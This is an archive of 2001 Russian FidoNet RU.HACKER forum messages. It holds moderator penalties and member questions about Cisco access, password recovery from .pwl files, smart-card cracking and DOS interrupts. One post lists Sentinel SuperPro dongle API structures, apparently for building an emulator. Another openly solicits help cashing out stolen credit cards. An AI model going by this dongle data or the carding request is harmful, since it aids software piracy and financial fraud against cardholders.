1 мес. - непрофессионализм - ненастроенный софт With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: (2:464/117.88) = Здесь обитают хакеры ====================================================New= Msg : 504 [1-10330] From : Comoderator of RU HACKER 03-Oct-01 09:09:48 2:5053/49 To : Alexey Kolotsey 2:452/999.48 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= Hello, Alexey ! 01.10.2001 20:45, Alexey Kolotsey wrote to Alexander Lunkov: AK> _.+'''+._ AK> ╔═┤ _< Lex >_ Моё почтение вам, уважаемый #/*Alexander/*# _!!!_ AK> ║ _`+,,,+'_ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ AK> │ [skipped] AK> А там, по моему, Micrisoft тоже с каким то иском фигурировал ??? [skipped] AK> │ AK> ║ [_Всего хорошего_ /Alexander/] [*С уважением Alexis*] AK> ╚═┤ ───────────═════════════[-= Fido est =-]═════════════─────────── За невыполнение пpавил конфеpенции наказывается: Alexey Kolotsey, 2:452/999.48, 03/10/01, Moderatorial [!], 1 мес. - овеpквотинг. - несоответствие рулесам размера приветствия и подписи. CC: 2:452/999 With best regards, Comoderator ( graf0man @ narod.ru ) --- GoldED/W32 3.0.1 * Origin: С кем поведешься - на того и дети похожи! (2:5053/49) = Здесь обитают хакеры ====================================================New= Msg : 505 [1-10330] From : Comoderator of RU HACKER 03-Oct-01 09:12:47 2:5053/49 To : Andrey Lobastov 2:464/77.30 Subj : Вопросик =====================================================================RU.HACKER= Hello, Andrey ! 02.10.2001 17:54, Andrey Lobastov wrote to All: AL> Помогите "найти" пароль к интернету. Есть: user.dat, system.dat, *.pwl AL> товарища (взят на спор). Заранее sorry за "чайниковый" вопрос бегом в RU.HACKER.DUMMY За невыполнение пpавил конфеpенции наказывается: Andrey Lobastov, 2:464/77.30, 03/10/01, Moderatorial [!], 1 мес. - непрофессионализм. CC: 2:464/77 With best regards, Comoderator ( graf0man @ narod.ru ) --- GoldED/W32 3.0.1 * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/49) = Здесь обитают хакеры ====================================================New= Msg : 506 [1-10330] From : Comoderator of RU HACKER 03-Oct-01 09:39:02 2:5053/49 To : All Subj : список награжденных =====================================================================RU.HACKER= Hello, All ! ╔════════════════╦════════════════════╦═══╦════════╦══════════════════════════╗ ║ Адрес ║ Имя ║Mod║ Дата ║ Причина ║ ╠════════════════╬════════════════════╬═══╬════════╬══════════════════════════╣ ║2:450/144.52 ║Maxim Praneuski ║[!]║23/09/01║несоответствие тематике к.║ ║2:450/199.0 ║Igorr V Syurtukov ║[!]║03/10/01║многочисленные нарушения ║ ║ ║ ║[*]║16/08/01║обращение к (ко)модератор.║ ║2:450/199.50 ║Misha Malohvey ║[+]║23/08/01║личная переписка в эхе ║ ║2:452/113.27 ║Dmitry Korotkevich ║[!]║23/09/01║непрофессионализм ║ ║2:452/54.25 ║Ariman ║[!]║10/09/01║незарегистрированный псев.║ ║2:452/999.48 ║Alexey Kolotsey ║[!]║03/10/01║несоответствие подписи ру.║ ║2:460/120.57 ║Ivan Mihailov ║[!]║26/06/01║невыполнение правил конфе.║ ║2:461/605.0 ║Nickolas Hirgij ║[*]║23/09/01║обращение к (Ко)Модератор.║ ║2:4614/1.637 ║Oleg Gajdar ║[+]║08/08/01║личная переписка в эхе ║ ║2:4623/35.122 ║Sergey Gvozdik ║[!]║08/08/01║невыполнение правил конфе.║ ║ ║ ║[+]║08/08/01║бессодержательное сообщен.║ ║2:4625/22.55 ║Strelok ║[!]║08/07/01║невыполнение правил конфе.║ ║2:463/422.7 ║Yura Hilobochenko ║[!]║03/10/01║вопрос из FAQ ║ ║2:463/499.80 ║valuxa ║[+]║08/08/01║невыполнение правил конфе.║ ║2:464/117.88 ║Vyacheslav V Yuksa ║[!]║03/10/01║ненастроенный софт ║ ║2:464/34.74 ║Alex 'Agent' Smith ║[+]║01/09/01║несоответствие рулесам по.║ ║2:464/77.30 ║Andrey Lobastov ║[!]║03/10/01║непрофессионализм ║ ║2:4654/6.14 ║Nicolay Granovsky ║[!]║19/08/01║непрофессионализм ║ ║2:467/116.9 ║Vert ║[+]║15/07/01║несоответствие тематике э.║ ║2:467/117.34 ║Yuriy Saloid ║[*]║08/07/01║попытка навязывания флейма║ ║2:5000/111.33 ║Anton Fedorov ║[+]║04/08/01║несоответствие тематике э.║ ║2:5002/27.61 ║Roman Ignatyev ║[+]║21/09/01║несоответствие рулесам по.║ ║2:5003/150.9 ║Anton Parfenov ║[*]║27/06/01║бессодержательное сообщен.║ ║2:5003/39.64 ║Kluchnikov Eugene ║[+]║09/08/01║RTFM! ║ ║2:5004/55.77 ║Maxim Potapov ║[!]║19/07/01║постинг UUE без согласова.║ ║2:5004/70.33 ║Max Levashov ║[+]║31/07/01║невыполнение правил конфе.║ ║2:5006/24.2 ║Alexei Duzhiy ║[!]║21/09/01║оверквотинг ║ ║2:5008/36.7 ║Dmitry Pantelemonov ║[!]║10/07/01║обращение к (ко)модератор.║ ║2:5009/5.43 ║Dmitry Kalinin ║[+]║18/07/01║невыполнение правил конфе.║ ║2:5010/119.1 ║Andrey Gripasev ║[!]║05/09/01║несоответствие тематике э.║ ║2:5010/229.16 ║Andrew Mironenko ║[!]║27/06/01║нарушение полиси ║ ║2:5015/52.51 ║Denis Korablev ║[!]║08/07/01║невыполнение правил конфе.║ ║2:5016/5.38 ║Alexy Khohlov ║[!]║26/07/01║невыполнение правил конфе.║ ║2:5020/1057.100 ║Andrey Sokolov ║[+]║04/08/01║невыполнение правил конфе.║ ║ ║ ║[+]║04/08/01║невыполнение правил конфе.║ ║2:5020/1202.33 ║Schetkin Aleksey ║[!]║05/09/01║несоответствие тематике э.║ ║ ║ ║[+]║01/09/01║бессодержательное сообщен.║ ║2:5020/1815.29 ║Nail Makhmutov ║[+]║25/07/01║невыполнение правил конфе.║ ║ ║ ║[+]║25/07/01║невыполнение правил конфе.║ ║2:5020/2009.63 ║Edward Pozhidayeff ║[+]║09/08/01║личная переписка в эхе ║ ║2:5020/2046.13 ║Evgeny Savitsky ║[+]║21/09/01║поддержание оффтопичного .║ ║2:5020/2777.50 ║Nassimi Mamed-zade ║[!]║02/08/01║рецидив модераториала ║ ║2:5020/3003.19 ║Pavel Vasilyev ║[+]║08/08/01║невыполнение правил конфе.║ ║2:5022/5.56 ║Sergey Krutyko ║[!]║21/09/01║личная переписка в эхе ║ ║2:5024/111.4 ║Vlad Gorbunov ║[!]║14/08/01║злостный оффтопик ║ ║ ║ ║[+]║08/08/01║личная переписка в эхе ║ ║2:5025/150.220 ║Denis Balandin ║[+]║29/08/01║ненастроенный софт ║ ║ ║ ║[+]║29/08/01║ненастроенный софт ║ ║2:5025/31.0 ║Andrew Lugovskih ║[!]║06/09/01║несоответствие тематике э.║ ║2:5026/61.4 ║Sema Ishinov ║[!]║21/09/01║постинг UUE без согласова.║ ║2:5027/12.123 ║Ruslan Masalov ║[*]║16/08/01║бессодержательное сообщен.║ ║2:5030/1294.16 ║Kirill Riadnykh ║[!]║29/09/01║нарушение правил конферен.║ ║2:5030/1392.49 ║Sergey Parafilov ║[!]║12/09/01║невыполнение правил конфе.║ ║2:5030/1399.1 ║Mihail Kotov-Krupkin║[+]║01/09/01║несоответствие рулесам по.║ ║2:5030/2470.71 ║Kazman ║[!]║29/08/01║незарегистрированный псев.║ ║2:5030/2929.20 ║Alexey Perov ║[+]║29/08/01║несоответствие рулесам по.║ ║2:5030/746.20 ║Maxim Lebedev ║[+]║21/09/01║поддержание оффтопичного .║ ║2:5030/918.31 ║Vladimir Borisov ║[!]║21/09/01║личная переписка в эхе ║ ║2:5030/937.14 ║Vladimir Kan ║[!]║08/07/01║призыв к экстремизму ║ ║2:5030/946.53 ║Sasha Egorov ║[!]║04/09/01║непрофессионализм ║ ║2:5036/26.12 ║Yuriy Tagilcev ║[+]║01/09/01║непрочтение рулесов ║ ║2:5040/28.74 ║Edik Ryzhov ║[+]║22/08/01║обращение к (ко)модератор.║ ║2:5042/1.0 ║stpark ║[!]║01/09/01║незарегистрированный псев.║ ║2:5045/78.33 ║Vasek Molokanov ║[*]║27/06/01║обращение к (ко)модератор.║ ║2:5050/112.0 ║Dmitry Pushkarev ║[*]║26/07/01║личная переписка в эхе ║ ║2:5055/114.20 ║Eugene E Konovalov ║[*]║16/08/01║обращение к (ко)модератор.║ ║2:5055/141.20 ║Aleksey Avvakumov ║[!]║16/07/01║рецидив модераториала ║ ║2:5055/99.14 ║Andrey Chebotarev ║[+]║18/06/01║личная переписка в эхе ║ ║2:5059/30.0 ║Dmitry Volkov ║[+]║21/09/01║личная переписка в эхе ║ ║2:5066/18.95 ║Eugene N Vasiljev ║[!]║12/09/01║несоответствие тематике э.║ ║2:5069/18.12 ║Gleb Rebrov ║[+]║12/09/01║несоответствие рулесам по.║ ║ ║ ║[+]║12/09/01║несоответствие тематике э.║ ║2:5070/269.0 ║Michael Savin ║[!]║21/09/01║постинг троянов без описа.║ ║2:5079/46.93 ║Popov Alexander ║[!]║19/06/01║невыполнение правил конфе.║ ║2:5080/301.0 ║ivan@novouralsk.ru ║[!]║07/08/01║незарегистрированный псев.║ ║2:5082/14.6 ║Ilya Krasovsky ║[!]║21/09/01║поиск софта ║ ║2:5085/80.9 ║Oleg Danilov ║[!]║01/09/01║личная переписка в эхе ║ ║2:5090/114.18 ║Виктор Маслихов ║[+]║05/09/01║непрофессионализм ║ ║ ║ ║[+]║05/09/01║непрофессионализм ║ ║2:5090/74.47 ║Alexey Grebenuk ║[+]║21/09/01║несоответствие тематике э.║ ║2:6016/3.4 ║Andrey Krotkov ║[!]║21/09/01║непрофессионализм ║ ╚════════════════╩════════════════════╩═══╩════════╩══════════════════════════╝ With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- GoldED/W32 3.0.1 * Origin: С кем поведешься - на того и дети похожи! (2:5053/49) = Здесь обитают хакеры ====================================================New= Msg : 507 [1-10330] From : Anatoly Romashkin 03-Oct-01 12:02:24 2:5093/56 To : Stas Urchenko 2:5030/668.18 Subj : Cisco =====================================================================RU.HACKER= Приветствую категорически, Stas ! Wednesday October 03 2001, Stas Urchenko writes to All: SU> Кто может помочь инфой по взлому сабжа, отзовитесь... с консоли с циской можно сделать все что угодно, начиная со сбpоса паpоля пpи логине (пассвоpд-pековеpи) и заканчивая любым изменением конфигуpации. удаленно - ломай сколько угодно, pезультат такой же как если биться головой об стенку такое утвеpждение могу позволить себе сделать по пpостой пpичине - мне платят з/п за конфигуpиpование цисок, стоящих в нашей оpганизации 2all: если кто-то аpгументиpованно докажет обpатное - велком в мыло, либо на емыл that's all... mailto: jerky@chat.ru --- * Origin: Stop the world, I want to get off (2:5093/56) = Здесь обитают хакеры ====================================================New= Msg : 508 [1-10330] From : Victor Ekimov 03-Oct-01 15:26:29 2:5077/52 To : Stas Urchenko 2:5030/668.18 Subj : Cisco =====================================================================RU.HACKER= Здpавствyй Stas! 03 Окт 01 01:13, Stas Urchenko -> All: SU> Кто может помочь инфой по взломy сабжа, отзовитесь... В стаpых веpсиях IOS был yнивеpсальный паpоль: admin/admin Давно это было:) ... Cейчас, если достyпа к консоли нет - забей. ╔ *WBR, v1ct0r* ══════════════╗ ╚ _e-mail: v1ct0r@chat.ru_ ═══╝ ... Яма, как пpинцип движения к солнцy... (с) ГpОб --- GoldED/386 3.00.Beta5+ * Origin: -----=======<<<< HackNet Station >>>>=======----- (2:5077/52) = Здесь обитают хакеры ====================================================New= Msg : 509 [1-10330] Pvt From : Nataly Mueller 03-Oct-01 18:38:53 2:4635/99.30 To : All Subj : Digital TV =====================================================================RU.HACKER= Hello, All! Подскажите плс, где можно найти инфу как ломать смарткарты для дигитал тв Nataly --- GoldED+/386 1.0.0 * Origin: http://www.kupinet.de (2:4635/99.30) = Здесь обитают хакеры ====================================================New= Msg : 510 [1-10330] From : Olli Artemjev 03-Oct-01 14:02:37 2:0/322 To : Stas Urchenko 2:5030/668.18 Subj : Cisco =====================================================================RU.HACKER= Hi, Stas ! On 03 Oct 2001 at 01:13, "SU", Stas Urchenko wrote: SU> _*HELL-0*_ /All/ Кто может помочь инфой по взлому сабжа, отзовитесь... www.cisco.com тебе поможет. После _продолжительного_ поиска можно откопать там информацию по пофиксенным эксплойтам - уж больно у них там неочевидная структура сайта. :) Как бывает в большинстве случаев они действуют на многих цисках и после публикации. По разным причинам. В том числе всвязи с ленью админов и невозможностью апгрейда по каким либо соображениям. -- Bye.Olli. mailto(remove "NOSPAM"): olli@digger.NOSPAMorg.ru *: Linux may become a power in a well directed hands. --- Gnus/5.0803 (Gnus v5.8.3) XEmacs/21.1 (Bryce Canyon) * Origin: Sunrise. (2:5020/1354.0) = Здесь обитают хакеры ====================================================New= Msg : 511 [1-10330] From : Olli Artemjev 03-Oct-01 14:53:49 2:0/31 To : Anatoly Romashkin 2:5093/56 Subj : Cisco =====================================================================RU.HACKER= Hi, Anatoly ! On 03 Oct 2001 at 12:02, "AR", Anatoly Romashkin wrote: AR> удаленно - ломай сколько угодно, pезультат такой же как если биться AR> головой об стенку. AR> такое утвеpждение могу позволить себе сделать по пpостой пpичине - мне AR> платят з/п за конфигуpиpование цисок, стоящих в нашей оpганизации. Да простят меня модераторы.. надеюсь это не будет коммерческой деятельностью.. Прошу рассматривать это письмо в качестве письма по поиску бетта-тестеров и никак иначе. =) AR> 2all: если кто-то аpгументиpованно докажет обpатное - велком в мыло, AR> либо на емыл. Есть некоторая, в каком то смысле фундаментальная, особенность работы железа, в том числе циско, но не только Cisco, а например 3com, avaya, bay-networks - практически любого обрудования сравнимого по интеллекту с железом cisco. Она позволяет реализовать внутри LAN следующие классические типы атак по отношению к оборудованию с настройками по умолчанию: DoS, MitM, provocation sniffing. Скажи - твоя контора заинтересована в получении этой информации _до_ того как она попадет в bugtraq с моим From? По поводу мотивации которая покажется нам достаточной (поскольку авторов анализа уязвимости двое), чтобы объяснить тебе что и как и возможные пути защиты до публикации, или просто дать тебе почитать статью до публикации (с условием неразглашения) - обращайся в _e_mail (не в netmail). Hекоторое количество народа получит нашу статью в момент постинга в bugtraq, поскольку просили об этом _в_ _начале_ разработки (сейчас такие заявки без достойной мотивации уже не принимаются - я упарюсь заполнять список в CC ;) ). Прошу заметить, что я никого не шантажирую - упомянутые здесь атаки будут в bugtraq, скорее всего, в ближайшие 2-3 месяца (в силу отсутствия свободного времени то, что можно сделать за неделю длится уже 2 месяца), так что Вы можете просто подождать и исправить ситуацию по факту появления информации в свободном доступе. =) В принципе все еще принимаются предложения от желающих помочь в тестирование уязвимости на Вашем обрудовании, со следующими условиями: это не оборудование фирм 3com,cisco,avaya (у нас уже есть где посмотреть на данное оборудование), это в пределах Москвы, тестирование провожу лично я либо со своего ноутбука, либо загруившись с CD на Вашей персоналке подключенной в сеть. Желательно, чтобы была возможность перекомутации оборудования для создания наглядных примеров топологии. В качестве feedback могу предложить объяснение (в общих чертах) принципов работы уязвимости (с условием неразглашения до публикации) после тестирования и, по Вашему желанию, упоминание в списке tester'ов в статье. Об удобном времени можно договориться email'ом. Откроспощено также в другие эхи, в которых могут обитать потенциальные желающие протестировать нашу разработку, прошу прощения, если это offtopic... -- Bye.Olli. mailto(remove "NOSPAM"): olli@digger.NOSPAMorg.ru *: "Cтpaнныe дни.." /Мaйк Hayмeнкo,Зooпapк. --- Gnus/5.0803 (Gnus v5.8.3) XEmacs/21.1 (Bryce Canyon) * Origin: Sunrise. (2:5020/1354.0) = Здесь обитают хакеры ====================================================New= Msg : 512 [1-10330] K/s From : Vitaly Chekryzhev 04-Oct-01 00:13:12 2:5011/214.33 To : Dmitri Patrakov 2:5093/18.17 Subj : DLL =====================================================================RU.HACKER= Здpавствyйте, Dmitri Patrakov! 01 Окт 95 22:06, Dmitri Patrakov wrote to Evgeny Savitsky: DP> Good morning to thee, gentle friend and traveller Evgeny! DP> ■ Суббота Сентябрь 29 2001 Evgeny Savitsky wrote to Dmitri Patrakov: DP>>> Hаpод, чем DLL'кy pаскypочить можно? DP> Мне не ресурсы нужны, а процедуры и функции... Есть тучи программ: например: ExeScope, Restorator DP> ··-=■ [Team Manowar] [Team Tolkien] [Team Ultima] [Team Arena] DP> ■=-·· DP> -+- With best regards, Dmitri Patrakov. DP> + Origin: NETMAIL (2:5093/18.17) До встpечи, Vitaly. --- * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) = Здесь обитают хакеры ====================================================New= Msg : 513 [1-10330] K/s From : Vitaly Chekryzhev 04-Oct-01 00:11:08 2:5011/214.33 To : Andrey Lobastov 2:464/77.30 Subj : Вопросик =====================================================================RU.HACKER= Здpавствyйте, Andrey Lobastov! 01 Окт 99 18:54, Andrey Lobastov wrote to All: AL> Привет ALL! AL> Помогите "найти" пароль к интернету. Есть: user.dat, system.dat, *.pwl Главный критерий это время, а уж имея такие исходные данные грешно не найти! AL> товарища (взят на спор). Заранее sorry за "чайниковый" вопрос AL> :) Спасибо! До встpечи, Vitaly. --- * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) = Здесь обитают хакеры ====================================================New= Msg : 514 [1-10330] From : Dmitriy Podporin 04-Oct-01 00:45:54 2:5020/2071.978 To : All Subj : Запись на CD =====================================================================RU.HACKER= Приветствую Вас, наиглубокоуважаемый, All! Hаpод тут у меня вопpос возник. Я столкнулся с такой штукой(иначе не могу сказать): 1. Существует диск (cd) лабоpатоpии Каспеpского (лецензионный) 2. У него 10 пpивязок. 3. С каждой установкой снимается по пpивязке. Вопpос: Каким обpазом возмона запись на ОБЫЧHЫЙ сидиpум ??? (обычным, не R/W пpиводом). Тестиpовали - пpивязки снимаются... ??? Hо как ?? P.S. Как оналаги pаботают с дискетами - я знаю, но вот сидюк - это нонсенс!!! (или я от этой жизни отстал ???) Рад был пообщаться, All! --- Продаю гаубицы, танки и самолеты. P.S. Самовывоз с Северного Кавказа * Origin: Верь в тропу - и она сама тебя выведет (2:5020/2071.978) = Здесь обитают хакеры ====================================================New= Msg : 515 [1-10330] From : Viktor I. Kovshik 04-Oct-01 16:16:23 2:5042/11 To : All Subj : [FWD] DOS interrupts =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : NETMAIL (NETMAIL) * От : Alexander Gerasimov, 2:461/581.7 (03.10.2001 22:58) * Кому : Viktor I Kovshik * Тема : DOS interrupts ============================================================================= Hi Viktor ! Если данный вопрос соответствует теме конференции RU.HACKER, plz, помести его туда. Реальный режим. Есть обработчик прерывания, например, 1Ch. Как можно получить CS, IP прерванной задачи? Правильно ли следующее: в ее (прерванной задачи) стеке находятся: 1. Flags. 2. CS. 3. IP. 4. Регистры ОH, сегментные регистры, кроме, само собой, SS. ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 516 [1-10330] From : Anatoly Romashkin 04-Oct-01 10:50:31 2:5093/56 To : All 2:5042/11 Subj : [FWD] DOS interrupts =====================================================================RU.HACKER= Приветствую категорически, All ! Thursday October 04 2001, Viktor I. Kovshik writes to All: VIK> : Alexander Gerasimov, 2:461/581.7 (03.10.2001 22:58) * Кому : Viktor I VIK> Kovshik * Тема : DOS interrupts VIK> ========================================================================== VIK> Реальный режим. VIK> Есть обработчик прерывания, например, 1Ch. Как можно получить CS, IP VIK> прерванной задачи? Правильно ли следующее: в ее (прерванной задачи) стеке VIK> находятся: VIK> 1. Flags. VIK> 2. CS. VIK> 3. IP. VIK> 4. Регистры ОH, сегментные регистры, кроме, само собой, SS. лет десять назад, во вpема пpоцветания доса, написал пpогу (100% asm), котоpая выводит на экpан содеpжимое флагов и pегистpов пpи вызове любой ф-ции любого пpеpывания. могу поделиться. этого баpахла не жалко. дос умеp.. that's all... mailto: jerky@chat.ru --- * Origin: ...it's a great life, if you don't weaken... (2:5093/56) = Здесь обитают хакеры ====================================================New= Msg : 517 [1-10330] From : Max Ivanov 02-Oct-01 14:32:41 2:5030/110.50 To : Michael Gribkov 2:5030/345.7 Subj : Rainbow Sentinel =====================================================================RU.HACKER= [USSR, St.Leningrad, 02 Oct 01] ■ 01 Oct 01, [Michael Gribkov]  [All]: MG> Мужики, кто-нить серьезно ковырял субжевые ключи? В частности MG> SuperPro? Поделитесь, плз, какой-нить инфой, сырцами эмулей, MG> ссылочками, етс. А то в доках все убого написано, нет некоторой инфы. MG> В частности мне нужно описание структуры API_Packet, ------8<------- ; ; (c)2001 by MeteO, meteo@null.net ; ; A list of Sentinel SuperPRO services. ; RB_SP_MEMORY_SIZE EQU 040h ; ; Dongle types ; RB_PRO EQU 1 RB_CPLUS EQU 2 RB_SUPER_PRO EQU 3 RB_SCRIBE EQU 6 ; SP_CELL_SN EQU 0 SP_CELL_DI EQU 1 SP_CELL_OP1 EQU 2 SP_CELL_OP2 EQU 3 SP_CELL_WP EQU 4 SP_CELL_RESERVED1 EQU 5 SP_CELL_RESERVED2 EQU 6 SP_CELL_RESERVED3 EQU 7 ; SP_CELL_ACC_DATA EQU 0 SP_CELL_ACC_LOCKED_DATA EQU 1 SP_CELL_ACC_COUNTER EQU 2 SP_CELL_ACC_ALGO EQU 3 ; ; Sentinel SuperPro internal functions ; fn_SPRO_INITIALIZE = 00h ; RNBOsproInitialize fn_SPRO_GETVERSION = 01h ; RNBOsproGetVersion fn_SPRO_SET_UNIT_INFO = 02h ; RNBOsproGetUnitInfo fn_SPRO_GET_UNIT_INFO = 03h ; RNBOsproSetUnitInfo fn_SPRO_CFG_LIB_PARAMS = 06h ; RNBOsproCfgLibParams fn_SPRO_FIND_1ST_UNIT = 08h ; RNBOsproFindFirstUnit fn_SPRO_FIND_NEXT_UNIT = 09h ; RNBOsproFindNextUnit fn_SPRO_READ = 0Ah ; RNBOsproRead fn_SPRO_EXT_READ = 0Bh ; RNBOsproExtendedRead fn_SPRO_DECREMENT = 0Ch ; RNBOsproDecrement fn_SPRO_WRITE = 0Dh ; RNBOsproWrite fn_SPRO_OVERWRITE = 0Eh ; RNBOsproOverwrite fn_SPRO_ACTIVATE = 0Fh ; RNBOsproActivate fn_SPRO_QUERY = 10h ; RNBOsproQuery ; ; Sentinel Scribe internal functions ; fn_SK_INITIALIZE = 00h ; RNBOskInitialize fn_SK_GETVERSION = 01h ; RNBOskGetVersion fn_SK_SET_UNIT_INFO = 02h ; RNBOskGetUnitInfo fn_SK_GET_UNIT_INFO = 03h ; RNBOskGetUnitInfo fn_SK_CFG_LIB_PARAMS = 07h ; RNBOskCfgLibParams fn_SK_READ = 0Bh ; RNBOskRead fn_SK_WRITE = 0Ch ; RNBOskWrite fn_SK_ENABLE = 0Dh ; RNBOskEnable ; ; Sentinel Pro internal functions ; fn_PRO_INITIALIZE = 00 ; RNBOproInitialize fn_PRO_GETVERSION = 01 ; RNBOproGetVersion fn_PRO_SET_UNIT_INFO = 02 ; RNBOproGetUnitInfo fn_PRO_GET_UNIT_INFO = 03 ; RNBOproSetUnitInfo fn_PRO_FN4 = 04 fn_PRO_FN5 = 05 fn_PRO_CFG_LIB_PARAMS = 06 ; RNBOproCfgLibParams fn_PRO_QUERY = 09 ; RNBOproQuery ; Response EQU offset Packet.xtraPassword1 DevId EQU offset Packet.AccessCode ; Packet struc Sign DW ? BufSize DW ? field_4 DW ? Status DW ? DongleType DB ? field_9 DB ? UnitNumber DB ? OsType DB ? field_C DW ? field_E DW ? field_10 DW ? field_12 DW ? data DB 28 DUP ( ? ) FunctionCode DW ? Unkn DW ? MemoryAddress DW ? MemoryContents DW ? AccessCode DB ? rsv DB ? WritePassword DW ? xtraPassword1 DW ? xtraPassword2 DW ? field_3F DB ? mappedAddr DW ? portType DW ? MaskInts DW ? deviceRetryCnt DW ? contentionRetryCnt DW ? padding1 DW ? flags1 DD ? contentionMethod DD ? contentionRetryInterval DD ? Packet ends ; ─────────────────────────────────────────────────────────────────────────── ; enum INTERNAL_ERRORS SP_SUCCESS EQU 0 SP_INVALID_FUNCTION_CODE EQU 1 SP_INVALID_PACKET EQU 2 SP_UNIT_NOT_FOUND EQU 3 SP_ACCESS_DENIED EQU 4 SP_INVALID_MEMORY_ADDRESS EQU 5 SP_INVALID_ACCESS_CODE EQU 6 SP_PORT_IS_BUSY EQU 7 SP_WRITE_NOT_READY EQU 8 SP_NO_PORT_FOUND EQU 9 SP_ALREADY_ZERO EQU 10 SP_DRIVER_OPEN_ERROR EQU 11 SP_DRIVER_NOT_INSTALLED EQU 12 SP_IO_COMMUNICATIONS_ERROR EQU 13 SP_PACKET_TOO_SMALL EQU 15 SP_INVALID_PARAMETER EQU 16 SP_MEM_ACCESS_ERROR EQU 17 SP_VERSION_NOT_SUPPORTED EQU 18 SP_OS_NOT_SUPPORTED EQU 19 SP_QUERY_TOO_LONG EQU 20 SP_INVALID_COMMAND EQU 21 SP_MEM_ALIGNMENT_ERROR EQU 29 SP_DRIVER_IS_BUSY EQU 30 SP_PORT_ALLOCATION_FAILURE EQU 31 SP_PORT_RELEASE_FAILURE EQU 32 SP_ACQUIRE_PORT_TIMEOUT EQU 39 SP_SIGNAL_NOT_SUPPORTED EQU 42 SP_UNKNOWN_MACHINE EQU 44 SP_SYS_API_ERROR EQU 45 SP_UNIT_IS_BUSY EQU 46 SP_INVALID_PORT_TYPE EQU 47 SP_INVALID_MACH_TYPE EQU 48 SP_INVALID_IRQ_MASK EQU 49 SP_INVALID_CONT_METHOD EQU 50 SP_INVALID_PORT_FLAGS EQU 51 SP_INVALID_LOG_PORT_CFG EQU 52 SP_INVALID_OS_TYPE EQU 53 SP_INVALID_LOG_PORT_NUM EQU 54 SP_INVALID_ROUTER_FLGS EQU 56 SP_INIT_NOT_CALLED EQU 57 SP_DRVR_TYPE_NOT_SUPPORTED EQU 58 SP_FAIL_ON_DRIVER_COMM EQU 59 ; ─────────────────────────────────────────────────────────────────────────── ; enum DRIVER_VER ; drv_RMDOS = 1 ; RealMode DOS local driver drv_Win3xx_local= 2 ; Windows 3.xx local driver drv_Win32s_local= 3 ; Win32s local driver drv_Win3xx_sys = 4 ; Windows 3.xx system driver drv_WinNT = 5 ; Windows NT system driver drv_OS2 = 6 ; OS/2 system driver drv_Win95 = 7 ; Windows95 system driver ------8<------- Ж;) [T.Xm] //FotD ex-//UCL (Leningrad) np: silence --- GluckED/P5 2.43.P0810+ * Origin: The -[ Press_ ]- //UCL'1994-2000 (2:5030/110.50) = Здесь обитают хакеры ====================================================New= Msg : 518 [1-10330] From : Igor Skochinsky 04-Oct-01 09:42:42 2:450/91.101 To : Dmitriy Podporin 2:5020/2071.978 Subj : Запись на CD =====================================================================RU.HACKER= Hello Dmitriy! Thursday October 04 2001 00:45, Dmitriy Podporin wrote to All: DP> Hаpод тут у меня вопpос возник. Я столкнулся с такой штукой(иначе DP> не могу сказать): 1. Существует диск (cd) лабоpатоpии Каспеpского DP> (лецензионный). DP> 2. У него 10 пpивязок. DP> 3. С каждой установкой снимается по пpивязке. DP> Вопpос: Каким обpазом возмона запись на ОБЫЧHЫЙ сидиpум ??? DP> (обычным, не R/W пpиводом). Тестиpовали - пpивязки снимаются... ??? DP> Hо как ??? Скоpее всего инфоpмация о количестве инсталляций пишется кyда-то на винчестеp, т.е. если инсталлиpовать на дpyгой компьютеp, то там счетчик должен быть свой WBR, Igor ... mailto: skochinsky|AT|mail.ru --- GoldED/W32 3.0.1 * Origin: Igor's place (Antwerpen, Belgium) (2:450/91.101) = Здесь обитают хакеры ====================================================New= Msg : 519 [1-10330] From : Igor Skochinsky 04-Oct-01 09:48:19 2:450/91.101 To : Viktor I. Kovshik 2:5042/11 Subj : [FWD] DOS interrupts =====================================================================RU.HACKER= Hello Viktor! Thursday October 04 2001 16:16, Viktor I. Kovshik wrote to All: VK> Реальный режим. VK> Есть обработчик прерывания, например, 1Ch. Как можно получить CS, IP VK> прерванной задачи? Правильно ли следующее: в ее (прерванной задачи) VK> стеке находятся: VK> 1. Flags. VK> 2. CS. VK> 3. IP. VK> 4. Регистры ОH, сегментные регистры, кроме, само собой, SS. Только 1-3. WBR, Igor ... mailto: skochinsky|AT|mail.ru --- GoldED/W32 3.0.1 * Origin: Igor's place (Antwerpen, Belgium) (2:450/91.101) = Здесь обитают хакеры ====================================================New= Msg : 520 [1-10330] From : Georges Kiritchenko 04-Oct-01 14:50:05 2:469/150.58 To : All Subj : Анонимный сеРфинг =====================================================================RU.HACKER= Хай ВАМ Братия ! Существует в инете такой вот серверок... <---> URL 1 <---> URL 2 Мой комп ----> ПровИдер ----> Хитрый (искомый) <---> ... <---- <--- сервант <---> ... <---> URL N Т.Е. трафик скрывается хитрым серверком (не путать с прокси). Подскажите URL плиз !!! Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 521 [1-10330] From : Don Waz 04-Oct-01 16:42:57 2:0/9111 To : All Subj : надо обналичить креды =====================================================================RU.HACKER= сабж креды без CVC2 все предложения мылом wasary@mail.ru --- Microsoft Outlook Express 5.50.4522.1200 * Origin: Centre of Electronic Communications (Vladimir) (2:5024/11.0) = Здесь обитают хакеры ====================================================New= Msg : 522 [1-10330] From : Denis Yandukin 04-Oct-01 20:48:50 2:5066/18.9 To : All Subj : AMI BIOS изменить =====================================================================RU.HACKER= Как поживаете, All? Есть проблема, при загрузке машина останавливается, ругается на часы, и ждет нажатия на F1. Жмем, загружаемся и видим, что часы, минуты и секунды обнулены а все остальное (дата, 